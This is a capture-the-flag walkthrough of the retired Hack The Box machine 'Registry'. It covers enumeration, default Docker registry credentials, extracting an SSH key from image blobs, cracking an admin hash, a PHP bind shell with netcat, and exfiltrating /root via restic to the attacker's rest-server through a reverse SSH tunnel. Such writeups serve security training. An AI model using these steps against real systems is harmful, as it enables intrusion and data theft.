Introduction
Registry is a retired machine from the platform hack the box and writeups of retired machines are only allowed.
Registry is a HARD machine of worth points 40.
![Hack the box registry writeup](https://www.whatinfotech.com/wp-content/uploads/2020/04/Screenshot-from-2020-04-04-02-30-02-1024x471.png)
Steps
- Nmap scan
- Enumerating webpages
- Exploiting docker
- Getting docker blobs
- Getting id_rsa keys
- Getting user.txt
- Enumerating
- Login into bolt webpage and uploading reverse shell
- Backing up file using rest server and getting root.txt.
Commands used
- nmap -sC -sV -oV 10.10.10.159
- gobuster dir -u http://10.10.10.159 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
- gobuster dir -u http://docker.registry.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
- curl –user “admin:admin” http://docker.registry.htb/v2/bolt-image/manifests/latest
- ssh -i id_rsa [email protected]
- strings bolt.db | grep admin
- gobuster dir -u http://10.10.10.159/bolt -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
- scp -i id_rsa nc [email protected]:/tmp
- nc 10.10.10.159 12345
- python -c ‘import pty; pty.spawn(“/bin/sh”)’
- bash -i
- sudo -l
- apt-get install restic
- restic init –repo writeup
- rest-server –path writeup –no-auth
- ssh -R 8000:127.0.0.1:8000 -i id_rsa [email protected]
- sudo /usr/bin/restic backup -r rest:http://localhost:8000 /root
- restic restore 0feef7a574a2491f47aeb6ed06cdc806a9821d3f75d9d92f66561ab2a733ff19 –target /root/Desktop/htb/registry/ -r /root/Desktop/htb/registry/writeup/
Nmap Scan
Nmap 7.70 scan initiated Wed Feb 5 09:24:37 2020 as: nmap -sC -sV -oV 10.10.10.159
Nmap scan report for 10.10.10.159
Host is up (0.42s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 72:d4:8d:da:ff:9b:94:2a:ee:55:0c:04:30:71:88:93 (RSA)
| 256 c7:40:d0:0e:e4:97:4a:4f:f9:fb:b2:0b:33:99:48:6d (ECDSA)
|_ 256 78:34:80:14:a1:3d:56:12:b4:0a:98:1f:e6:b4:e8:93 (ED25519)
80/tcp open http nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Welcome to nginx!
443/tcp open ssl/http nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: 400 The plain HTTP request was sent to HTTPS port
| ssl-cert: Subject: commonName=docker.registry.htb
| Not valid before: 2019-05-06T21:14:35
|_Not valid after: 2029-05-03T21:14:35
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done at Wed Feb 5 09:26:38 2020 -- 1 IP address (1 host up) scanned in 120.76 seconds
![Hack the box(HTB) Registry writeup](https://www.whatinfotech.com/wp-content/uploads/2020/04/Screenshot-from-2020-04-03-04-31-44-1024x370.png)
Enumerating webpages
As I enumerate I found /bolt
![Hack the box(HTB) Registry writeup](https://www.whatinfotech.com/wp-content/uploads/2020/04/Screenshot-from-2020-04-03-05-13-16-1024x233.png)
![Hack the box(HTB) Registry writeup](https://www.whatinfotech.com/wp-content/uploads/2020/04/Screenshot-from-2020-04-03-05-20-56-1024x480.png)
Exploiting docker
But for now lets focus on Docker as we found that in nmap scan
![Hack the box(HTB) Registry writeup](https://www.whatinfotech.com/wp-content/uploads/2020/04/Screenshot-from-2020-04-03-05-16-57-1024x234.png)
When i open it .It asks for password and i simply tried admin:admin and it worked
![Hack the box(HTB) Registry writeup](https://www.whatinfotech.com/wp-content/uploads/2020/04/Screenshot-from-2020-04-03-05-22-31-1024x505.png)
I had to read the Docker docs for proceeding further.
So according to docs lets see /_catalog
And this gives us the repos in it.
Got a “bolt-image” repo
![Hack the box(HTB) Registry writeup](https://www.whatinfotech.com/wp-content/uploads/2020/04/Screenshot-from-2020-04-03-07-06-10-1024x445.png)
Getting docker blobs
After gathering some information about the docker now i knew that i can download the docker blobs.Which could give me juicy information.
So now lets try to get those
![Hack the box(HTB) Registry writeup](https://www.whatinfotech.com/wp-content/uploads/2020/04/Screenshot-from-2020-04-03-07-12-28-1024x495.png)
root@kali:~/Desktop/htb/registry# curl --user "admin:admin" http://docker.registry.htb/v2/bolt-image/manifests/latest
{
"schemaVersion": 1,
"name": "bolt-image",
"tag": "latest",
"architecture": "amd64",
"fsLayers": [
{
"blobSum": "sha256:302bfcb3f10c386a25a58913917257bd2fe772127e36645192fa35e4c6b3c66b"
},
{
"blobSum": "sha256:3f12770883a63c833eab7652242d55a95aea6e2ecd09e21c29d7d7b354f3d4ee"
},
{
"blobSum": "sha256:02666a14e1b55276ecb9812747cb1a95b78056f1d202b087d71096ca0b58c98c"
},
{
"blobSum": "sha256:c71b0b975ab8204bb66f2b659fa3d568f2d164a620159fc9f9f185d958c352a7"
},
{
"blobSum": "sha256:2931a8b44e495489fdbe2bccd7232e99b182034206067a364553841a1f06f791"
},
{
"blobSum": "sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4"
},
{
"blobSum": "sha256:f5029279ec1223b70f2cbb2682ab360e1837a2ea59a8d7ff64b38e9eab5fb8c0"
},
{
"blobSum": "sha256:d9af21273955749bb8250c7a883fcce21647b54f5a685d237bc6b920a2ebad1a"
},
{
"blobSum": "sha256:8882c27f669ef315fc231f272965cd5ee8507c0f376855d6f9c012aae0224797"
},
{
"blobSum": "sha256:f476d66f540886e2bb4d9c8cc8c0f8915bca7d387e536957796ea6c2f8e7dfff"
}
],
"history": [
{
"v1Compatibility": "{\"architecture\":\"amd64\",\"config\":{\"Hostname\":\"e2e880122289\",\"Domainname\":\"\",\"User\":\"\",\"AttachStdin\":true,\"AttachStdout\":true,\"AttachStderr\":true,\"Tty\":true,\"OpenStdin\":true,\"StdinOnce\":true,\"Env\":[\"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\"],\"Cmd\":[\"bash\"],\"Image\":\"docker.registry.htb/bolt-image\",\"Volumes\":null,\"WorkingDir\":\"\",\"Entrypoint\":null,\"OnBuild\":null,\"Labels\":{}},\"container\":\"e2e88012228993b25b697ee37a0aae0cb0ecef7b1536d2b8e488a6ec3f353f14\",\"container_config\":{\"Hostname\":\"e2e880122289\",\"Domainname\":\"\",\"User\":\"\",\"AttachStdin\":true,\"AttachStdout\":true,\"AttachStderr\":true,\"Tty\":true,\"OpenStdin\":true,\"StdinOnce\":true,\"Env\":[\"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\"],\"Cmd\":[\"bash\"],\"Image\":\"docker.registry.htb/bolt-image\",\"Volumes\":null,\"WorkingDir\":\"\",\"Entrypoint\":null,\"OnBuild\":null,\"Labels\":{}},\"created\":\"2019-05-25T15:18:56.9530238Z\",\"docker_version\":\"18.09.2\",\"id\":\"f18c41121574af38e7d88d4f5d7ea9d064beaadd500d13d33e8c419d01aa5ed5\",\"os\":\"linux\",\"parent\":\"9380d9cebb5bc76f02081749a8e795faa5b5cb638bf5301a1854048ff6f8e67e\"}"
},
{
"v1Compatibility": "{\"id\":\"9380d9cebb5bc76f02081749a8e795faa5b5cb638bf5301a1854048ff6f8e67e\",\"parent\":\"d931b2ca04fc8c77c7cbdce00f9a79b1954e3509af20561bbb8896916ddd1c34\",\"created\":\"2019-05-25T15:13:31.3975799Z\",\"container_config\":{\"Cmd\":[\"bash\"]}}"
},
{
"v1Compatibility": "{\"id\":\"d931b2ca04fc8c77c7cbdce00f9a79b1954e3509af20561bbb8896916ddd1c34\",\"parent\":\"489e49942f587534c658da9060cbfc0cdb999865368926fab28ccc7a7575283a\",\"created\":\"2019-05-25T14:57:27.6745842Z\",\"container_config\":{\"Cmd\":[\"bash\"]}}"
},
{
"v1Compatibility": "{\"id\":\"489e49942f587534c658da9060cbfc0cdb999865368926fab28ccc7a7575283a\",\"parent\":\"7f0ab92fdf7dd172ef58247894413e86cfc60564919912343c9b2e91cd788ae4\",\"created\":\"2019-05-25T14:47:52.6859489Z\",\"container_config\":{\"Cmd\":[\"bash\"]}}"
},
{
"v1Compatibility": "{\"id\":\"7f0ab92fdf7dd172ef58247894413e86cfc60564919912343c9b2e91cd788ae4\",\"parent\":\"5f7e711dba574b5edd0824a9628f3b91bfd20565a5630bbd70f358f0fc4ebe95\",\"created\":\"2019-05-24T22:51:14.8744838Z\",\"container_config\":{\"Cmd\":[\"/bin/bash\"]}}"
},
{
"v1Compatibility": "{\"id\":\"5f7e711dba574b5edd0824a9628f3b91bfd20565a5630bbd70f358f0fc4ebe95\",\"parent\":\"f75463b468b510b7850cd69053a002a6f10126be3764b570c5f80a7e5044974c\",\"created\":\"2019-04-26T22:21:05.100534088Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c #(nop) CMD [\\"/bin/bash\\"]\"]},\"throwaway\":true}"
},
{
"v1Compatibility": "{\"id\":\"f75463b468b510b7850cd69053a002a6f10126be3764b570c5f80a7e5044974c\",\"parent\":\"4b937c36cc17955293cc01d8c7c050c525d22764fa781f39e51afbd17e3e5529\",\"created\":\"2019-04-26T22:21:04.936777709Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c mkdir -p /run/systemd \u0026\u0026 echo 'docker' \u003e /run/systemd/container\"]}}"
},
{
"v1Compatibility": "{\"id\":\"4b937c36cc17955293cc01d8c7c050c525d22764fa781f39e51afbd17e3e5529\",\"parent\":\"ab4357bfcbef1a7eaa70cfaa618a0b4188cccafa53f18c1adeaa7d77f5e57939\",\"created\":\"2019-04-26T22:21:04.220422684Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c rm -rf /var/lib/apt/lists/\"]}}" }, { "v1Compatibility": "{\"id\":\"ab4357bfcbef1a7eaa70cfaa618a0b4188cccafa53f18c1adeaa7d77f5e57939\",\"parent\":\"f4a833e38a779e09219325dfef9e5063c291a325cad7141bcdb4798ed68c675c\",\"created\":\"2019-04-26T22:21:03.471632173Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c set -xe \t\t\u0026\u0026 echo '#!/bin/sh' \u003e /usr/sbin/policy-rc.d \t\u0026\u0026 echo 'exit 101' \u003e\u003e /usr/sbin/policy-rc.d \t\u0026\u0026 chmod +x /usr/sbin/policy-rc.d \t\t\u0026\u0026 dpkg-divert --local --rename --add /sbin/initctl \t\u0026\u0026 cp -a /usr/sbin/policy-rc.d /sbin/initctl \t\u0026\u0026 sed -i 's/^exit./exit 0/' /sbin/initctl \t\t\u0026\u0026 echo 'force-unsafe-io' \u003e /etc/dpkg/dpkg.cfg.d/docker-apt-speedup \t\t\u0026\u0026 echo 'DPkg::Post-Invoke { \\"rm -f /var/cache/apt/archives/.deb /var/cache/apt/archives/partial/.deb /var/cache/apt/.bin || true\\"; };' \u003e /etc/apt/apt.conf.d/docker-clean \t\u0026\u0026 echo 'APT::Update::Post-Invoke { \\"rm -f /var/cache/apt/archives/.deb /var/cache/apt/archives/partial/.deb /var/cache/apt/.bin || true\\"; };' \u003e\u003e /etc/apt/apt.conf.d/docker-clean \t\u0026\u0026 echo 'Dir::Cache::pkgcache \\"\\"; Dir::Cache::srcpkgcache \\"\\";' \u003e\u003e /etc/apt/apt.conf.d/docker-clean \t\t\u0026\u0026 echo 'Acquire::Languages \\"none\\";' \u003e /etc/apt/apt.conf.d/docker-no-languages \t\t\u0026\u0026 echo 'Acquire::GzipIndexes \\"true\\"; Acquire::CompressionTypes::Order:: \\"gz\\";' \u003e /etc/apt/apt.conf.d/docker-gzip-indexes \t\t\u0026\u0026 echo 'Apt::AutoRemove::SuggestsImportant \\"false\\";' \u003e /etc/apt/apt.conf.d/docker-autoremove-suggests\"]}}"
},
{
"v1Compatibility": "{\"id\":\"f4a833e38a779e09219325dfef9e5063c291a325cad7141bcdb4798ed68c675c\",\"created\":\"2019-04-26T22:21:02.724843678Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c #(nop) ADD file:7ce84f13f11609a50ece7823578159412e2299c812746d1d1f1ed5db0728bd37 in / \"]}}"
}
],
"signatures": [
{
"header": {
"jwk": {
"crv": "P-256",
"kid": "QQ2T:PCE7:WMFR:5VWJ:FF32:J2HW:G5LM:3XTD:HJQX:TEFW:FKBN:QK7D",
"kty": "EC",
"x": "SyOHJcjv-eu4X_77D9pe8kI0sXaWPTxo8WiUwnGvwXE",
"y": "u_IHhlf6_3V1LMlThz5uTkN7Hte_3MKTRG8KFK08TBg"
},
"alg": "ES256"
},
"signature": "Cwt68GIS76MHRn5M1uxdF6DQkCvMpwCdcDH7BJHfZsh5fcfhRsoA5ouGM1J_CJDl1KaZakg-b4hAxWSNOS_3hw",
"protected": "eyJmb3JtYXRMZW5ndGgiOjY3OTIsImZvcm1hdFRhaWwiOiJDbjAiLCJ0aW1lIjoiMjAyMC0wNC0wM1QxMToxNDo1NVoifQ"
}
]
Now lets download the blob sum
https://docker.registry.htb/v2/bolt-
image/blobs/sha256:c71b0b975ab8204bb66f2b659fa3d568f2d164a620159fc9f9f185d958c352a7
Getting id_rsa keys.
I downloaded all the blobs and placed them in the folder.
After extracting the files i got many directories .
In the root directory i found .ssh file for user bolt.
And after a little enumeration i found the passphrase for the encrypted id_rsa.
So lets ssh into the machine using id_rsa key. As port 22 is open.
Before running make sure that you give permission 600 to it
chmod 600 id_rsa
Getting user.txt
![Hack the box(HTB) Registry writeup](https://www.whatinfotech.com/wp-content/uploads/2020/04/Screenshot-from-2020-04-03-07-28-48-1024x374.png)
Enumerating
After login into the bolt we have the user.txt
I found the 10.10.10.159/bolt in gobuster hence now i was searching for a database or config file .So went inside /var and enumerating in www found a bolt.db.
![Hack the box(HTB) Registry writeup](https://www.whatinfotech.com/wp-content/uploads/2020/04/Screenshot-from-2020-04-03-07-36-29-1024x410.png)
You can either download it with nc to ur file and then use any online .db file opener.
But i user strings cmd and found the hash for admin of the website.
bolt@bolt:/var/www/html/bolt/app/database$ strings bolt.db | grep admin
2020-04-03 09:10:11Logged in: admin/bolt/bolt/loginpostLogin10.10.14.4authentication{"file":"/src/Controller/Backend/Authentication.php","line":193}
2020-04-03 08:55:26Logged in: admin/bolt/bolt/loginpostLogin10.10.15.181authentication{"file":"/src/Controller/Backend/Authentication.php","line":193}
2020-04-03 08:46:00Logged out: admin/bolt/bolt/logoutlogout10.10.15.181authentication{"file":"/src/Controller/Backend/Authentication.php","line":129}
2020-04-03 08:23:51Logged in: admin/bolt/bolt/loginpostLogin10.10.15.181authentication{"file":"/src/Controller/Backend/Authentication.php","line":193}
2019-10-17 14:34:52Logged in: admin/bolt/bolt/loginpostLogin10.10.14.2authentication{"file":"/src/Controller/Backend/Authentication.php","line":193}
3admin$2y$10$e.ChUytg9SrL7AsboF2bX.wWKQ1LkS5Fi3/[email protected] 09:10:1110.10.14.4Admin["files://bind.php"]["root","everyone"]
admin
I used john to decrypt the hash and got password as “strawberry”
Now when we have creds lets find the login page.
root@kali:~/Desktop/htb/registry# gobuster dir -u http://10.10.10.159/bolt -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@FireFart)
[+] Url: http://10.10.10.159/bolt
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
2020/04/03 07:51:56 Starting gobuster
/files (Status: 301)
/tests (Status: 301)
/src (Status: 301)
/app (Status: 301)
/theme (Status: 301)
/vendor (Status: 301)
/extensions (Status: 301)
/bolt (Status: 302)
Login into bolt webpage and uploading reverse shell
I got a /bolt again and when i visited it landed me on login page.
![Hack the box(HTB) Registry writeup](https://www.whatinfotech.com/wp-content/uploads/2020/04/Screenshot-from-2020-04-03-07-58-23-1024x498.png)
Now i created a simple php reverse shell.
![Hack the box(HTB) Registry writeup](https://www.whatinfotech.com/wp-content/uploads/2020/04/Screenshot-from-2020-04-03-08-00-28-1024x365.png)
But before i do it i needed to transfer my nc to the target machine.
scp -i id_rsa nc [email protected]:/tmp
![Hack the box(HTB) Registry writeup](https://www.whatinfotech.com/wp-content/uploads/2020/04/Screenshot-from-2020-04-04-01-05-18-1024x84.png)
If you are not familiar with Scp you can use base64 also.
![Hack the box(HTB) Registry writeup](https://www.whatinfotech.com/wp-content/uploads/2020/04/Screenshot-from-2020-04-04-01-07-29-1024x431.png)
Then we can simply copy paste on target machine and do a simple chmod +x command.
![Hack the box(HTB) Registry writeup](https://www.whatinfotech.com/wp-content/uploads/2020/04/Screenshot-from-2020-04-04-01-10-00-1024x443.png)
![Hack the box(HTB) Registry writeup](https://www.whatinfotech.com/wp-content/uploads/2020/04/Screenshot-from-2020-04-04-01-10-35-1024x155.png)
But when i tried to upload the php file but i was unable .Then I changed the main configurations.
![Hack the box(HTB) Registry writeup](https://www.whatinfotech.com/wp-content/uploads/2020/04/Screenshot-from-2020-04-03-07-59-07-1024x503.png)
So i added php in it.Once i have done everything i went to File management to upload my file.
I got errors like this many time
![Hack the box(HTB) Registry writeup](https://www.whatinfotech.com/wp-content/uploads/2020/04/Screenshot-from-2020-04-04-01-17-31-1024x447.png)
Now i have to upload the php file quickly as machine has cron jobs which will revert my changes hence i need to be fast in doing this.
Here we are using bind shell so once our .php file executes then we will run our nc(netcat).
We used bind shell because the machine is not allowing reverse shells.
![](https://www.whatinfotech.com/wp-content/uploads/2020/04/Screenshot-from-2020-04-04-01-20-40-1024x170.png)
On doing sudo -l i found a restic server backup with wwwdata can do .So i thought of Backing up Data to my own system using restic server.
We have to install restic server to our own machine
apt-get install restic
![Hack the box(HTB) Registry writeup](https://www.whatinfotech.com/wp-content/uploads/2020/04/Screenshot-from-2020-04-04-01-26-36-1024x179.png)
We can google and easily find how that works hence now it was time to initialize a repo.
![Hack the box(HTB) Registry writeup](https://www.whatinfotech.com/wp-content/uploads/2020/04/Screenshot-from-2020-04-04-01-37-17-1024x137.png)
root@kali:~/Desktop/htb/registry# restic init --repo writeup
enter password for new repository:
enter password again:
created restic repository d53e9e7757 at writeup
Please note that knowledge of your password is required to access
the repository. Losing your password means that your data is
irrecoverably lost.
root@kali:~/Desktop/htb/registry# rest-server --path writeup --no-auth
Data directory: writeup
Authentication disabled
Private repositories disabled
Starting server on :8000
After initializing now we need to set the path.
![Hack the box(HTB) Registry writeup](https://www.whatinfotech.com/wp-content/uploads/2020/04/Screenshot-from-2020-04-04-01-50-06-1024x79.png)
Used –no-auth for no authentication.
Now we need to do port forwarding in order to get the backup.
![Hack the box(HTB) Registry writeup](https://www.whatinfotech.com/wp-content/uploads/2020/04/Screenshot-from-2020-04-04-01-55-23-1024x185.png)
root@kali:~/Desktop/htb/registry# ssh -R 8000:127.0.0.1:8000 -i id_rsa [email protected]
Enter passphrase for key 'id_rsa':
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-65-generic x86_64)
System information as of Sat Apr 4 05:42:35 UTC 2020
System load: 0.0 Users logged in: 1
Usage of /: 6.5% of 61.80GB IP address for eth0: 10.10.10.159
Memory usage: 46% IP address for br-1bad9bd75d17: 172.18.0.1
Swap usage: 1% IP address for docker0: 172.17.0.1
Processes: 181
Last login: Sat Apr 4 05:00:22 2020 from 10.10.14.63
bolt@bolt:~$
Once we done everything now its time for backing up the data into our own machine.
![Hack the box(HTB) Registry writeup](https://www.whatinfotech.com/wp-content/uploads/2020/04/Screenshot-from-2020-04-04-01-40-41-1024x173.png)
Once we do it successfully a snapshot will be stored in our local machine and then we can just restore that.
![Hack the box(HTB) Registry writeup](https://www.whatinfotech.com/wp-content/uploads/2020/04/Screenshot-from-2020-04-04-01-45-06-1024x113.png)
root@kali:~/Desktop/htb/registry/root# cat root.txt
ntr###############################w
![Hack the box(HTB) Registry writeup](https://www.whatinfotech.com/wp-content/uploads/2020/04/Screenshot-from-2020-04-04-01-45-19-1024x44.png)
Thanks for reading my writeup.
Supprb broπππ
thanks buddy